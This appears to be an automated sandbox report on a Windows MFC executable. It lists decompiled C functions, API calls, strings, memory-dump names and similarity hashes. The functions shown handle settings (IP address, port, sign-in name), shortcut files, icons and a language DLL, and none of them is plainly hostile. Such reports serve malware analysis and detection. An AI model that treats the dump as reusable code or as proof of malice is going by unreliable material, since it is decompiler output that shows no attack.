0x0040bd54
0x0040bd59
0x0040bd5e
0x0040bd65
0x0040bd6f
0x0040bd77

APIs

_EH_prolog.MSVCRT ref: 0040BCA2
#4497.MFC42 ref: 0040BCAD
SendMessageA.USER32 ref: 0040BCC9
#6402.MFC42(Settings,IPAdress,?), ref: 0040BCDE
SendMessageA.USER32 ref: 0040BCF2
#6402.MFC42(Settings,PortNumber,00000000), ref: 0040BD05
#540.MFC42(Settings,PortNumber,00000000), ref: 0040BD0D
#3874.MFC42(?,Settings,PortNumber,00000000), ref: 0040BD20
#6403.MFC42(Settings,SignInName,?,?,Settings,PortNumber,00000000), ref: 0040BD38
#6402.MFC42(Settings,SignIndex,00000000,Settings,SignInName,?,?,Settings,PortNumber,00000000), ref: 0040BD59
#800.MFC42(Settings,SignIndex,00000000,Settings,SignInName,?,?,Settings,PortNumber,00000000), ref: 0040BD65

Strings

Settings, xrefs: 0040BCD9
Settings, xrefs: 0040BD00
SignInName, xrefs: 0040BD2E
IPAdress, xrefs: 0040BCD4
PortNumber, xrefs: 0040BCFB
Settings, xrefs: 0040BD33
SignIndex, xrefs: 0040BD4F
Settings, xrefs: 0040BD54

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #6402$MessageSend$#3874#4497#540#6403#800H_prolog
String ID: IPAdress$PortNumber$Settings$Settings$Settings$Settings$SignInName$SignIndex
API String ID: 2207934601-1017397922
Opcode ID: 8a4ac68a6cd69900ac3f04795bba869b7ca688ad4180bd63adc8af47a20d8952
Instruction ID: 37e8abe2a77004a106e54dbaf6d15eaca24f1c3faa82b1c2894f0630d7c186fb
Opcode Fuzzy Hash: 8a4ac68a6cd69900ac3f04795bba869b7ca688ad4180bd63adc8af47a20d8952
Instruction Fuzzy Hash: 6611AC71750714EAE724FBA1DC42FAEB374AF80704F62441EB666720D1CEB82920CB38

Uniqueness

Uniqueness Score: -1.00%

Function 004209EE, Relevance: 31.6, APIs: 21, Instructions: 129
windowCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004209EE() {
				void* _t42;
				RGBQUAD* _t46;
				LOGPALETTE* _t55;
				PALETTEENTRY* _t58;
				RGBQUAD* _t62;
				BYTE* _t76;
				void* _t83;
				LOGPALETTE* _t84;
				int _t87;
				signed int _t89;
				void* _t90;

				L004269E6();
				L00425E44();
				_t42 = LoadImageA( *0x00429EEA,  *(_t90 + 8), 0, 0, 0, 0x2000);
				if(_t42 != 0) {
					_t83 =  *(_t90 + 0xc);
					_push(_t42);
					L004264BC();
					GetObjectA( *(_t83 + 4), 0x54, _t90 - 0x84);
					_t87 =  *(_t90 - 0x4c);
					if(_t87 == 0) {
						_t89 = 1;
						_t87 = _t89 <<  *(_t90 - 0x5e);
					}
					_push(0);
					L00426864();
					 *(_t90 - 4) = 0;
					if(_t87 <= 0x100) {
						_t46 = _t87 << 2;
						_push(_t46);
						L00425E38();
						_t62 = _t46;
						L004264B0();
						 *(_t90 - 4) = 1;
						asm("sbb eax, eax");
						_push(CreateCompatibleDC( ~(_t90 - 0x30) &  *(_t90 - 0x2c)));
						L004264AA();
						if(_t83 != 0) {
							_t83 =  *(_t83 + 4);
						}
						_push(_t83);
						_push( *(_t90 - 0x18));
						L00426540();
						asm("sbb eax, eax");
						GetDIBColorTable( ~(_t90 - 0x1c) &  *(_t90 - 0x18), 0, _t87, _t62);
						_t55 = 8 + _t87 * 4;
						_push(_t55);
						L00425E38();
						_t84 = _t55;
						_t84->palVersion = 0x300;
						_t84->palNumEntries = _t87;
						if(_t87 > 0) {
							_t24 =  &(_t84->palPalEntry[0]); // 0x5
							_t58 = _t24;
							_t25 =  &(_t62->rgbGreen); // 0x1
							_t76 = _t25;
							do {
								 *((char*)(_t58 - 1)) = _t76[1];
								_t58->peRed =  *_t76;
								_t58->peGreen =  *(_t76 - 1);
								_t58->peBlue = _t58->peBlue & 0x00000000;
								_t76 =  &(_t76[4]);
								_t58 = _t58 + 4;
								_t87 = _t87 - 1;
							} while (_t87 != 0);
						}
						_push(CreatePalette(_t84));
						L004264BC();
						_push(_t84);
						L00425DF0();
						_push(_t62);
						L00425DF0();
						 *(_t90 - 4) =  *(_t90 - 4) & 0x00000000;
						L0042649E();
					} else {
						_push(CreateHalftonePalette( *(_t90 - 0x2c)));
						L004264BC();
					}
					 *(_t90 - 4) =  *(_t90 - 4) | 0xffffffff;
					L0042685E();
					_push(1);
					_pop(0);
				} else {
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t90 - 0xc));
				return 0;
			}

0x004209f3
0x004209fc
0x00420a12
0x00420a1a
0x00420a25
0x00420a28
0x00420a2b
0x00420a3c
0x00420a42
0x00420a47
0x00420a4e
0x00420a4f
0x00420a4f
0x00420a51
0x00420a55
0x00420a60
0x00420a63
0x00420a7e
0x00420a81
0x00420a82
0x00420a88
0x00420a8d
0x00420a95
0x00420a9b
0x00420aa7
0x00420aab
0x00420ab2
0x00420ab4
0x00420ab4
0x00420ab7
0x00420ab8
0x00420abb
0x00420ac6
0x00420acf
0x00420ad5
0x00420adc
0x00420add
0x00420ae2
0x00420ae7
0x00420aec
0x00420af0
0x00420af2
0x00420af2
0x00420af5
0x00420af5
0x00420af8
0x00420afb
0x00420b00
0x00420b05
0x00420b08
0x00420b0c
0x00420b0f
0x00420b12
0x00420b12
0x00420af8
0x00420b1f
0x00420b20
0x00420b25
0x00420b26
0x00420b2b
0x00420b2c
0x00420b31
0x00420b3a
0x00420a65
0x00420a71
0x00420a72
0x00420a72
0x00420b3f
0x00420b46
0x00420b4b
0x00420b4d
0x00420a1c
0x00420a1c
0x00420b54
0x00420b5c

APIs

_EH_prolog.MSVCRT ref: 004209F3
#1168.MFC42 ref: 004209FC
LoadImageA.USER32 ref: 00420A12
#1641.MFC42(00000000), ref: 00420A2B
GetObjectA.GDI32(?,00000054,?), ref: 00420A3C
#289.MFC42(00000000), ref: 00420A55
CreateHalftonePalette.GDI32(?,00000000), ref: 00420A68
#1641.MFC42(00000000), ref: 00420A72
#613.MFC42(00000000), ref: 00420B46

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1641$#1168#289#613CreateH_prologHalftoneImageLoadObjectPalette
String ID:
API String ID: 2510670262-0
Opcode ID: a5cec944ab5735bafed10dfbfb48c0b54ac12888027489047dadce651933ccb0
Instruction ID: 38a5b39bae4f10dc7fb859db21631ee68e5cd551e57b971d04e85082c6676839
Opcode Fuzzy Hash: a5cec944ab5735bafed10dfbfb48c0b54ac12888027489047dadce651933ccb0
Instruction Fuzzy Hash: 01415E72A00265ABCB00EBB0EC89FFEBB78AF15308F91805EF15197192DB7D9905C758

Uniqueness

Uniqueness Score: -1.00%

Function 0040149C, Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 109
fileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E0040149C(void* __ecx, void* __eflags) {
				void* _t50;
				long _t53;
				void* _t57;
				void* _t60;
				void* _t87;
				void* _t88;
				void* _t90;

				L004269E6();
				_t87 = __ecx;
				L00425E08();
				 *(_t90 - 4) = 0;
				L0040227F(_t90 - 0x40);
				 *(_t90 - 4) = 1;
				GetModuleFileNameA(0, _t90 - 0x178, 0x104);
				_t50 = _t90 - 0x178;
				_push(_t50);
				L004261A4();
				_push(0x442184);
				L004261A4();
				_push(0x442188);
				L004261A4();
				_push(0x8085);
				L00425FB8();
				_push(_t50);
				 *(_t90 - 4) = 2;
				L00426054();
				 *(_t90 - 4) = 1;
				L00425DFC();
				_push(_t90 - 0x178);
				L004261A4();
				 *((intOrPtr*)(_t90 - 0x24)) = 0;
				 *((intOrPtr*)(_t90 - 0x20)) = 1;
				if(_t87 != 0) {
					_t88 =  *(_t87 + 0x20);
				} else {
					_t88 = 0;
				}
				_t53 = SHGetSpecialFolderLocation(_t88,  *(_t90 + 0xc), _t90 - 0x18);
				if(_t53 == 0) {
					_t53 = _t90 - 0x27c;
					__imp__SHGetPathFromIDListA( *(_t90 - 0x18), _t53);
				}
				_push(0xe000);
				L00425FB8();
				_push( *_t53);
				 *(_t90 - 4) = 3;
				_push(_t90 - 0x27c);
				_push("%s\\%s.lnk");
				_push(_t90 - 0x10);
				L00425FDC();
				 *(_t90 - 4) = 1;
				L00425DFC();
				_t99 =  *((intOrPtr*)(_t90 + 8));
				if( *((intOrPtr*)(_t90 + 8)) == 0) {
					DeleteFileA( *(_t90 - 0x10));
				} else {
					L00401D02(_t90 - 0x74);
					 *(_t90 - 4) = 4;
					_t60 = E004013F2(_t90 - 0x74, _t99, _t90 - 0x40);
					_t100 = _t60;
					if(_t60 != 0) {
						L00401CF3(_t90 - 0x74, _t100, _t90 - 0x10);
					}
					 *(_t90 - 4) = 1;
					L00401CC6(_t90 - 0x74);
				}
				 *(_t90 - 4) = 0;
				_t57 = L00401889(_t90 - 0x40);
				 *(_t90 - 4) =  *(_t90 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t90 - 0xc));
				return _t57;
			}

0x0040eb8c
0x0040eb99
0x0040eb9e
0x0040eba8
0x0040ebab
0x0040ebbd
0x0040ebc1
0x0040ebc7
0x0040ebd0
0x0040ebd1
0x0040ebd6
0x0040ebde
0x0040ebe3
0x0040ebeb
0x0040ebf0
0x0040ebf8
0x0040ebfd
0x0040ec01
0x0040ec05
0x0040ec0d
0x0040ec11
0x0040ec1f
0x0040ec20
0x0040ec27
0x0040ec2a
0x0040ec31
0x0040ec37
0x0040ec33
0x0040ec33
0x0040ec33
0x0040ec42
0x0040ec4a
0x0040ec4c
0x0040ec56
0x0040ec56
0x0040ec5c
0x0040ec64
0x0040ec69
0x0040ec71
0x0040ec75
0x0040ec79
0x0040ec7e
0x0040ec7f
0x0040ec8a
0x0040ec8e
0x0040ec93
0x0040ec96
0x0040ecd1
0x0040ec98
0x0040ec9b
0x0040eca7
0x0040ecab
0x0040ecb0
0x0040ecb2
0x0040ecbb
0x0040ecbb
0x0040ecc3
0x0040ecc7
0x0040ecc7
0x0040ecda
0x0040ecdd
0x0040ece2
0x0040ece9
0x0040ecf3
0x0040ecfb

APIs

_EH_prolog.MSVCRT ref: 0040EB8C
#540.MFC42 ref: 0040EB9E
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040EBC1
#860.MFC42(?), ref: 0040EBD1
#860.MFC42(00442184,?), ref: 0040EBDE
#860.MFC42(00442188,00442184,?), ref: 0040EBEB
#537.MFC42(00008085,00442188,00442184,?), ref: 0040EBF8
#858.MFC42(00000000,00008085,00442188,00442184,?), ref: 0040EC05
#800.MFC42(00000000,00008085,00442188,00442184,?), ref: 0040EC11
#860.MFC42(?,00000000,00008085,00442188,00442184,?), ref: 0040EC20
SHGetSpecialFolderLocation.SHELL32(00000001,?,?,?,00000000,00008085,00442188,00442184,?), ref: 0040EC42
SHGetPathFromIDListA.SHELL32(?,?), ref: 0040EC56
#537.MFC42(0000E000), ref: 0040EC64
#2818.MFC42(?,%s\%s.lnk,0000E000,00000000,0000E000), ref: 0040EC7F
#800.MFC42(?,0000E000), ref: 0040EC8E
DeleteFileA.KERNEL32(?,?,0000E000), ref: 0040ECD1
#800.MFC42(?,0000E000), ref: 0040ECE9

Strings

%s\%s.lnk, xrefs: 0040EC79

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #860$#800$#537File$#2818#540#858DeleteFolderFromH_prologListLocationModuleNamePathSpecial
String ID: %s\%s.lnk
API String ID: 4211795105-568909016
Opcode ID: 6648758b5d7892323ab5d9a8d16d60c67fc8a9fba416218a1bd3530eb7e6cd2a
Instruction ID: b17b01f2fd3ab37964e5237dfa2d4baf73cd5e6917736e1bd7fc505b84cc0e75
Opcode Fuzzy Hash: 6648758b5d7892323ab5d9a8d16d60c67fc8a9fba416218a1bd3530eb7e6cd2a
Instruction Fuzzy Hash: 4A41AE71904129EEDF10EBA2D986AEDB778BF14308FA0446EE405B31D2DB785B08CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004010A0, Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 102
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E004010A0() {
				struct HDC__* _t35;
				int _t37;
				struct HBITMAP__* _t38;
				void* _t46;
				struct HICON__* _t48;
				int _t52;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				struct HBITMAP__* _t66;
				int _t69;
				void* _t71;

				L004269E6();
				_t69 = 0;
				_t48 = ImageList_GetIcon( *( *((intOrPtr*)(_t71 + 0xc)) + 4),  *(_t71 + 0x10), 0);
				L004264B0();
				_t63 =  *((intOrPtr*)(_t71 + 8));
				 *(_t71 - 4) = 0;
				if(_t63 != 0) {
					_t35 =  *(_t63 + 4);
				} else {
					_t35 = 0;
				}
				_push(CreateCompatibleDC(_t35));
				L004264AA();
				_t37 =  *0x440d0c; // 0xf
				_t52 =  *0x440d08; // 0x10
				_t38 = CreateCompatibleBitmap( *(_t63 + 4), _t52, _t37);
				_t64 =  *((intOrPtr*)(_t71 + 0x14));
				_push(_t38);
				L004264BC();
				if(_t64 != _t69) {
					_t65 =  *((intOrPtr*)(_t64 + 4));
				} else {
					_t65 = 0;
				}
				_push(_t65);
				_push( *(_t71 - 0x20));
				L00426540();
				_t66 = _t38;
				 *(_t71 - 0x10) = _t69;
				 *(_t71 - 0x14) = 0x42e55c;
				 *(_t71 - 4) = 1;
				_push(CreateSolidBrush(GetSysColor(0xf)));
				L004264BC();
				_t17 = _t71 - 0x14; // 0x42e55c
				asm("sbb eax, eax");
				asm("sbb ecx, ecx");
				DrawIconEx( ~(_t71 - 0x24) &  *(_t71 - 0x20), _t69, _t69, _t48,  *0x440d08,  *0x440d0c, _t69,  ~_t17 &  *(_t71 - 0x10), 3);
				if(_t66 != _t69) {
					_t69 =  *(_t66 + 4);
				}
				_push(_t69);
				_push( *(_t71 - 0x20));
				L00426540();
				L004264A4();
				DestroyIcon(_t48);
				 *(_t71 - 0x14) = 0x42c514;
				 *(_t71 - 4) = 2;
				L00425FA6();
				 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
				 *(_t71 - 0x14) = 0x42c4fc;
				L0042649E();
				_t46 = 1;
				 *[fs:0x0] =  *((intOrPtr*)(_t71 - 0xc));
				return _t46;
			}

0x004142b4
0x004142c1
0x004142d4
0x004142d6
0x004142db
0x004142de
0x004142e3
0x004142e9
0x004142e5
0x004142e5
0x004142e5
0x004142f3
0x004142f7
0x004142fc
0x00414301
0x0041430c
0x00414312
0x00414315
0x00414318
0x0041431f
0x00414325
0x00414321
0x00414321
0x00414321
0x00414328
0x00414329
0x0041432c
0x00414331
0x00414333
0x00414336
0x0041433f
0x00414350
0x00414354
0x00414359
0x00414360
0x00414372
0x00414381
0x00414389
0x0041438b
0x0041438b
0x0041438e
0x0041438f
0x00414392
0x0041439a
0x004143a0
0x004143a6
0x004143b0
0x004143b4
0x004143b9
0x004143c0
0x004143c7
0x004143d1
0x004143d5
0x004143dd

APIs

_EH_prolog.MSVCRT ref: 004142B4
ImageList_GetIcon.COMCTL32(?,?,00000000), ref: 004142CB
#323.MFC42 ref: 004142D6
CreateCompatibleDC.GDI32(?), ref: 004142ED
#1640.MFC42(00000000), ref: 004142F7
CreateCompatibleBitmap.GDI32(?,00000010,0000000F), ref: 0041430C
#1641.MFC42(00000000), ref: 00414318
#5785.MFC42(?,?,00000000), ref: 0041432C
GetSysColor.USER32(0000000F), ref: 00414343
CreateSolidBrush.GDI32(00000000), ref: 0041434A
#1641.MFC42(00000000), ref: 00414354
DrawIconEx.USER32 ref: 00414381
#5785.MFC42(?,00000000), ref: 00414392
#2405.MFC42(?,00000000), ref: 0041439A
DestroyIcon.USER32(00000000,?,00000000), ref: 004143A0
#2414.MFC42 ref: 004143B4
#640.MFC42 ref: 004143C7

Strings

\B, xrefs: 00414351

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateIcon$#1641#5785Compatible$#1640#2405#2414#323#640BitmapBrushColorDestroyDrawH_prologImageList_Solid
String ID: \B
API String ID: 3094284070-2993081821
Opcode ID: 54f335d49f4542dda4a8dde4196bcd1f1bb727c8c201da0efc40fa9fcd1f847c
Instruction ID: beff783ddb7729a654386445507e2a1b5105f6ed7220b52430e4a91936a833c9
Opcode Fuzzy Hash: 54f335d49f4542dda4a8dde4196bcd1f1bb727c8c201da0efc40fa9fcd1f847c
Instruction Fuzzy Hash: DB319576A00125AFCB11EFE1ED49EEEBB79FF89314B51411AF505A3150CB386E44CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004021E9, Relevance: 31.6, APIs: 10, Strings: 8, Instructions: 97
windowCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E004021E9(void* __ecx) {
				signed short _t18;
				intOrPtr* _t21;
				void* _t31;
				void* _t32;
				void* _t61;
				void* _t63;

				L004269E6();
				_push(__ecx);
				_t61 = __ecx;
				_push(0);
				_push("IPAdress");
				_push("Settings");
				L00425E3E();
				SendMessageA( *(__ecx + 0xb0), 0x465, 0, E00428576);
				_t18 = SendMessageA( *(_t61 + 0x130), 0x46f, 0x5dc, 0xfde8);
				_push(0x5dc);
				_push("PortNumber");
				_push("Settings");
				L00425E3E();
				SendMessageA( *(_t61 + 0x130), 0x467, 0, _t18 & 0x0000ffff);
				_push(0x442164);
				_push("SignInName");
				_t21 = _t63 - 0x10;
				_push("Settings");
				_push(_t21);
				L00426234();
				_push( *_t21);
				 *(_t63 - 4) = 0;
				L00426120();
				 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
				L00425DFC();
				_t58 = _t61 + 0x1d0;
				L00401B13(_t61 + 0x1d0, 0x90);
				L00401B13(_t61 + 0x1d0, 0x91);
				L00401B13(_t58, 0x92);
				L00401B13(_t58, 0x93);
				L00401B13(_t58, 0x94);
				L00401B13(_t58, 0x95);
				L00401B13(_t58, 0x96);
				L00401B13(_t58, 0x97);
				L00401B13(_t58, 0x98);
				_t31 = L00401B13(_t58, 0x99);
				_push(0);
				_push("SignIndex");
				_push("Settings");
				L00425E3E();
				_t32 = L00401C5D(_t58, _t31);
				 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
				return _t32;
			}

0x0040bb04
0x0040bb09
0x0040bb0d
0x0040bb0f
0x0040bb11
0x0040bb1c
0x0040bb21
0x0040bb3a
0x0040bb52
0x0040bb5a
0x0040bb5b
0x0040bb60
0x0040bb65
0x0040bb7c
0x0040bb84
0x0040bb89
0x0040bb8e
0x0040bb91
0x0040bb96
0x0040bb97
0x0040bb9c
0x0040bba4
0x0040bba7
0x0040bbac
0x0040bbb3
0x0040bbb8
0x0040bbc5
0x0040bbd1
0x0040bbdd
0x0040bbe9
0x0040bbf5
0x0040bc01
0x0040bc0d
0x0040bc19
0x0040bc25
0x0040bc31
0x0040bc36
0x0040bc37
0x0040bc42
0x0040bc47
0x0040bc4f
0x0040bc5a
0x0040bc62

APIs

_EH_prolog.MSVCRT ref: 0040BB04
#3521.MFC42(Settings,IPAdress,00000000), ref: 0040BB21
SendMessageA.USER32 ref: 0040BB3A
SendMessageA.USER32 ref: 0040BB52
#3521.MFC42(Settings,PortNumber,000005DC), ref: 0040BB65
SendMessageA.USER32 ref: 0040BB7C
#3522.MFC42(?,Settings,SignInName,00442164), ref: 0040BB97
#6199.MFC42(00000000,?,Settings,SignInName,00442164), ref: 0040BBA7
#800.MFC42(00000000,?,Settings,SignInName,00442164), ref: 0040BBB3
#3521.MFC42(Settings,SignIndex,00000000,00000099,00000098,00000097,00000096,00000095,00000094,00000093,00000092,00000091,00000090,00000000,?,Settings), ref: 0040BC47

Strings

PortNumber, xrefs: 0040BB5B
Settings, xrefs: 0040BB60
Settings, xrefs: 0040BB91
SignIndex, xrefs: 0040BC37
Settings, xrefs: 0040BC42
Settings, xrefs: 0040BB1C
IPAdress, xrefs: 0040BB11
SignInName, xrefs: 0040BB89

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #3521MessageSend$#3522#6199#800H_prolog
String ID: IPAdress$PortNumber$Settings$Settings$Settings$Settings$SignInName$SignIndex
API String ID: 3937295072-1017397922
Opcode ID: 47b717c9f07083bd77ca1f0206805cfaf279bf344fedfd5a52b55af7d6a27b3b
Instruction ID: f7b8febfb108906bb52e0572c16d838be61318258c6e8ffadab950a5f25802e5
Opcode Fuzzy Hash: 47b717c9f07083bd77ca1f0206805cfaf279bf344fedfd5a52b55af7d6a27b3b
Instruction Fuzzy Hash: D5319570340700BAE61577619C53F7E72AAABC0718F41442FB2567B1E3EFB929119719

Uniqueness

Uniqueness Score: -1.00%

Function 004010E1, Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 86
libraryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E004010E1(void* __ecx, void* __edi) {
				struct HINSTANCE__* _t23;
				intOrPtr _t24;
				intOrPtr* _t25;
				void* _t46;
				void* _t51;
				void* _t53;

				_t46 = __edi;
				L004269E6();
				_push(__ecx);
				_t51 = __ecx;
				if( *((intOrPtr*)(_t53 + 0xc)) != 0) {
					_push( *((intOrPtr*)(_t53 + 8)));
					_push("Language");
					_push("Settings");
					L0042624C();
				}
				if( *((intOrPtr*)(_t53 + 8)) == 0) {
					_t23 = LoadLibraryA("CWUCliFr.dll");
				} else {
					FreeLibrary( *0x442170);
					_t23 =  *( *((intOrPtr*)(_t51 + 0x1bc)) + 0xc4);
				}
				 *0x442170 = _t23;
				if(_t23 == 0) {
					_push(0xffffffff);
					_push(0);
					_push(0x8072);
					L00425E56();
					_t24 = 1;
					_push(_t24);
					_push("Language");
					_push("Settings");
					 *((intOrPtr*)(_t51 + 0x384)) = _t24;
					L0042624C();
				} else {
					_push(_t46);
					L00425E44();
					 *(_t23 + 0xc) = _t23;
					_t25 = L00401DC0(_t51);
					_push(0xe001);
					L00426384();
					_push(0xe000);
					L00425FB8();
					_push( *_t25);
					 *(_t53 - 4) = 0;
					L00426120();
					 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
					L00425DFC();
					_push(0xe000);
					L00425FB8();
					 *(_t53 - 4) = 1;
					L004012EE(_t51,  *_t25);
					 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
					L00425DFC();
					_push(0);
					_push(0x8c);
					_t24 = L004013CF(_t51, 0x8d);
					if( *((intOrPtr*)(_t53 + 0xc)) != 0) {
						_t24 = L00401E60(_t51);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t24;
			}

0x004010e1
0x0040cb60
0x0040cb65
0x0040cb6d
0x0040cb6f
0x0040cb71
0x0040cb7a
0x0040cb7f
0x0040cb84
0x0040cb84
0x0040cb8c
0x0040cbad
0x0040cb8e
0x0040cb94
0x0040cba0
0x0040cba0
0x0040cbb5
0x0040cbba
0x0040cc4a
0x0040cc4c
0x0040cc4d
0x0040cc52
0x0040cc5f
0x0040cc60
0x0040cc61
0x0040cc66
0x0040cc6b
0x0040cc71
0x0040cbc0
0x0040cbc0
0x0040cbc3
0x0040cbca
0x0040cbcd
0x0040cbd2
0x0040cbd9
0x0040cbe6
0x0040cbe7
0x0040cbec
0x0040cbf0
0x0040cbf3
0x0040cbf8
0x0040cbff
0x0040cc04
0x0040cc08
0x0040cc11
0x0040cc18
0x0040cc1d
0x0040cc24
0x0040cc29
0x0040cc2a
0x0040cc36
0x0040cc3f
0x0040cc43
0x0040cc43
0x0040cc3f
0x0040cc7b
0x0040cc83

APIs

_EH_prolog.MSVCRT ref: 0040CB60
#6402.MFC42(Settings,Language,?), ref: 0040CB84
FreeLibrary.KERNEL32(Settings,Language,?), ref: 0040CB94
LoadLibraryA.KERNEL32(CWUCliFr.dll), ref: 0040CBAD
#1168.MFC42 ref: 0040CBC3
#6026.MFC42(0000E001), ref: 0040CBD9
#537.MFC42(0000E000,0000E001), ref: 0040CBE7
#6199.MFC42(00000000,0000E000,0000E001), ref: 0040CBF3
#800.MFC42(00000000,0000E000,0000E001), ref: 0040CBFF
#537.MFC42(0000E000,00000000,0000E000,0000E001), ref: 0040CC08
#800.MFC42(00000000,0000E000,00000000,0000E000,0000E001), ref: 0040CC24
#1199.MFC42(00008072,00000000,000000FF), ref: 0040CC52
